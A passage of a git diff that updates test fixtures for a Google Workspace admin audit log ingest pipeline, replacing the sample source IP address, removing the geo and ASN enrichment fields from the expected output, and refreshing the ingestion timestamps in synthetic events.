"67.43.156.13" ] }, "google_workspace": { @@ -2163,35 +1695,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821682500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}", + "ingested": "2021-12-09T13:38:46.977665700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS\"}}", "provider": "admin", "action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_NON_IOS", "id": "1", @@ -2221,7 +1735,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2240,35 +1754,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821684400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}", + "ingested": "2021-12-09T13:38:46.977670200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}", "provider": "admin", "action": "USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS", "id": "1", @@ -2298,7 +1794,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2322,35 +1818,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821686300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977675400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_ACCOUNT_WIPE", "id": "1", @@ -2381,7 +1859,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2405,35 +1883,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821688200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977680700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE", "id": "1", @@ -2464,7 +1924,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2488,35 +1948,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821690100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977686Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log index 3ad1efedd6a..0a2ae8ad792 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log @@ -1,17 +1,17 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ENABLED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ENABLED","value":"DISABLED"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"ASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"UNASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REVOKE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ALLOWED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ALLOWED","value":"EMPTY"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REMOVE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_DESCRIPTION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"MOVE_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_NAME","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REVOKE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"TOGGLE_SERVICE_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SERVICE_NAME","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ENABLED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ENABLED","value":"DISABLED"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"ASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"UNASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REVOKE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ALLOWED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ALLOWED","value":"EMPTY"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REMOVE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_DESCRIPTION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"MOVE_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_NAME","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REVOKE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"TOGGLE_SERVICE_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SERVICE_NAME","value":"new"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json index d47f4d6c70d..f056c45c276 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-org.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.814988300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:50.954861Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHROME_LICENSES_ENABLED", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:24.814997Z", - "original": 